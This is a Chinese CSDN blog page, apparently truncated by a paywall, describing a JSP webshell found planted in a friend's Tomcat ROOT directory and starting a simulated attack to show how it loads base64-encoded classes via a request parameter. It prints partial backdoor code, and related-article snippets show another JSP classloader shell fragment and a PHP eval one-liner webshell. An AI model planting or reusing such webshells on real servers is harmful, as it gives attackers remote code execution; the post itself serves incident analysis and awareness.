一次被木马攻击的记录

最新推荐文章于 2022-02-21 20:48:28 发布
最新推荐文章于 2022-02-21 20:48:28 发布
阅读量325 收藏
点赞数
分类专栏: 后端 文章标签: java 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kshzhaohui/article/details/119205024
版权

描述

最近一个老同学跟我说他部署在阿里云上的系统,在tomcat的目录下出现了一个index.jsp文件,内容大致如下:

image-20210728190124402.png

我一看发现这不就是一个木马后门文件吗,只需要通过参数ejiaogl传入一个经过base64编码的Class文件,这样就可以解码然后被类加载器加载,而我们知道类被加载的时候是可以执行static代码块的,而这个代码块可以任由攻击者来指定要执行的代码,是非常危险的,为了更加形象我特意做了一个模拟攻击。

模拟攻击

准备木马文件

准备一个Tomcat,直接启动即可,默认访问的是ROOT目录下的index.jsp,准备好以上的木马后门文件直接替换,文件如下:

<%!
//自定义了一个类加载器
class U extends ClassLoader{
    U(ClassLoader c){
        super(c);
    }
    
    public Class g(byte[] b) {
        return this.defineClass(b, 0, b.length);
    }
}
​
public byte[] base64Decoder(String str) throws Exception {
最低0.47元/天 解锁文章
kshzhaohui
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java jsp 木马_JSP安全开发之XSS漏洞详解
weixin_39991055的博客
12-21 502
前言大家好,好男人就是我,我就是好男人,我就是-0nise。在各大漏洞举报平台,我们时常会看到XSS漏洞。那么问题来了,为何会出现这种漏洞?出现这种漏洞应该怎么修复?正文1.XSS?XSS?XSS是什么鬼?XSS又叫跨站脚本攻击(Cross Site Scripting),我不会告诉他原本是叫CSS的,但是为了不和我们所用的层叠样式表(Cascading Style Sheets)CSS搞混。CS...
Web应急:网站首页被篡改
06-10 601
网站首页被非法篡改,是的,就是你一打开网站就知道自己的网站出现了安全问题,网站程序存在严重的安全漏洞,攻击者通过上传脚本木马,从而对网站内容进行篡改。而这种篡改事件在某些场景下,会被无限放大。 现象描述 网站首页被恶意篡改,比如复制原来的图片,PS一下,然后替换上去。 问题处理 1、确认篡改时间 通过对被篡改的图片进行查看,确认图片篡改时间为2018年04月18日 19:24:...
传说中的JSP木马!JSP资源管理器.
laobu的专栏
09-20 2786
 其实这不能算是木马了.不过如果能上传到某个垃圾服务器上倒是可以做很多事.呵呵.下面是程序原代码:  文件名 adminIndex.jsp注意:这里用到了一个包. org.apache.commons.fileupload.* 如果你有了这个包,可以把 页面中 注释的部分去掉.即可实现文件上传功能.这个是上传文件用的包 commons-fileupload-1.0.jar 可以到
木马是什么意思?
fengyun1225172396的博客
02-21 1万+
木马又被称为木马病毒,是指隐藏在正常程序中的一段具有特殊功能的恶意代码,木马程序表面上是无害的,甚至对没有警戒的用户还颇有吸引力,它们经常隐藏在游戏或图形软件中,但它们却隐藏着恶意。这些表面上看似友善的程序运行后,就会进行一些非法的行动,如删除文件或对硬盘格式化,木马程序是目前比较流行的病毒文件,与一般的病毒不同,它不会自我繁殖,也并不“刻意”地去感染其他文件,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种主机的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至远程操控被种主机 木马病毒通常是
一次利用mssql上线1
08-03
本文记录一次通过Microsoft SQL Server(简称MSSQL)进行上线操作的安全测试过程。在渗透测试中,当主要网站未发现明显漏洞时,转向子站点进行深度挖掘。在子站上,检测到了一个MSSQL注入漏洞,这是由于SQL查询...
IIS服务器安全配置防木马权限设置
03-22
【IIS服务器安全配置防木马权限设置】是关于如何保护IIS服务器免受恶意攻击木马侵入的关键步骤。IIS(Internet Information Services)是微软提供的一个用于托管Web应用程序和服务的平台。确保其安全配置对于任何...
论网络攻击技术与网络安全(全文).docx
最新发布
06-10
据有关部门统计,"木马"攻击占全部病毒破坏事件的90%,仅20XX 年上半年,境外就有近8万台主机对我境内计算机进行过木马攻击,我境内有近一百万台计算机被植入"木马"。 1.3 监听XX络数据的嗅探器 XX络嗅探即XX络监听...
网络安全知识竞赛小测试--网络攻击技术.pdf
06-09
一种病毒的名称 20、TCP SYN 泛洪攻击的原理是利用了( )[单选题] * A.TCP 三次握手过程(正确答案) B.TCP 面向流的工作机制 C.TCP 数据传输中的窗口技术 D.TCP 连接终止时的 FIN 报文 21、以下对 TCP 协议发起连接...
操作系统第二次作业答案[参照].pdf
10-12
解释:木马是一种恶意程序,它可以被远程控制,用于攻击系统。木马通常是恶意攻击者用来入侵系统的方法。 19. 下列关于内存地址叙述不正确的是程序员使用的地址是物理地址。 解释:程序员使用的地址是逻辑地址,而...
Vulnstack内网靶场4
weixin_48888525的博客
11-07 2666
环境 漏洞详情 (qiyuanxuetang.net) 仅主机模式内网网段192.168.183.0/24 外网网段192.168.157.0/24 其中Ubuntu作为对外的内网机器  攻击机kali地址:192.168.157.129  悬剑:192.168.157.130 还需要进入ubuntu开启服务,密码ubuntu cd /home/ubuntu/Desktop/vulhub/struts2/s2-045vsudo docker-compose up -d cd
哥斯拉jsp马分析
zeros__的博客
12-27 6184
前言: 这篇文章分析了哥斯拉jsp马的特征原理,写这篇文章的原因是希望提高对哥斯拉马的识别、改造能力。 笔者接触安全的时间较短,难免会有疏漏,恳请发现问题的大佬给予指正。 哥斯拉PHP马解析可以看这篇文章: https://blog.csdn.net/zeros__/article/details/111521314 正文: 贴一下哥斯拉的jsp马: < % !String xc = "3c6e0b8a9c15224a"; String pass = "pass"; String md5 = md
一句话木马上传常见的几种方法
YidaHu的博客
01-06 3万+
1,利用00截断,brupsuite上传利用00截断就是利用程序员在写程序时对文件的上传路径过滤不严格,产生0X00上传截断漏洞。 假设文件的上传路径为http://xx.xx.xx.xx/upfiles/lubr.php.jpg ,通过Burpsuite抓包截断将lubr.php后面的“.”换成“0X00”。在上传的时候,当文件系统读到”0X00″时,会认为文件已经结束,从而将lubr.php.
java复习题库
繁星博客
11-12 3万+
选择题 1:下列概念中不属于面向对象这种编程范畴的是()? A.对象消息 B.继承多态 C.类封装 D.过程调用 ?D 2:下面哪条语句把方法声明为抽象的公共方法()? A.public abstract method(); B.public abstra...
黑洞木马实验
qq_43717119的博客
06-22 1362
实验20 黑洞木马实验 【实验目的】 1、了解木马感染的手段 2、掌握利用木马的办法 【实验环境】 系统环境:2台windows 2003 实验工具:Blackhole(D:\攻防工具包\黑洞木马) EXE捆绑机(D:\攻防工具包\黑洞木马\EXE捆绑机) 【实验预备知识点】 1、 木马程序(Trojan horse program)通常称为木马,恶意代码等,是指潜伏在电脑中,可受外部用户控制以窃取本机信息或者控制权的程序。木马指的是特洛伊木马,英文叫做“Trojan horse”,其名称取自希腊神话的特洛
JSP一句话小马
旺仔Sec&blog
11-13 3033
<%! class NATIVE extends ClassLoader{ NATIVE(ClassLoader c){super(c);} public Class routine(byte[] b){ return super.defineClass(b, 0, b.length); } } public byte[] runtime(String str) throws Exception { Class base64; byte[] value = null; ...
自己整理的一套Java题库
热门推荐
weixin_41719737的博客
01-15 3万+
一、选择题 1.Java语言中,只限子类或者同一包中的类的方法能访问的访问权限是(   C  ) A、public       B、private     C、protected  D、无修饰 private: Java语言中对访问权限限制的最窄的修饰符,一般称之为“私有的”。被其修饰的属性以及方法只能被该类的对象访问,其子类不能访问,更不能允许跨包访问。 default:即不加任何访问修...
windows简单入侵排查
a1b2c3是弱口令
09-03 5231
客户内网被撸了,需要援助,调查发现: 1.内部网络中,出现大量内网攻击行为,主机、服务器对内部主机进行同网段扫描,漏洞攻击; 2.内部主机对外网地址445端口进随机扫描; 3.内部主机大量访问外网恶意威胁地址; 共发现25台主机、服务器感染木马病毒 1.处置ms17-010漏洞 1.1.定位感染PC终端、服务器,永恒之蓝扫描工具 对内网进行全网扫描,定位存在漏洞...
Web安全-一句话木马
liuwei0376的专栏
08-20 3969
概述 在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马: <?php @eval($_POST['attack']);?> 【基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀 chopper.exe 即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语
阐明特洛伊木马攻击的步骤及原理。
06-06
特洛伊木马攻击是一种利用恶意软件进行的攻击攻击者通过植入木马程序,获取被攻击者的敏感信息或控制被攻击者的计算机。其攻击步骤和原理如下: 1. 植入木马程序:攻击者通过利用漏洞或社会工程学手段,将木马...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值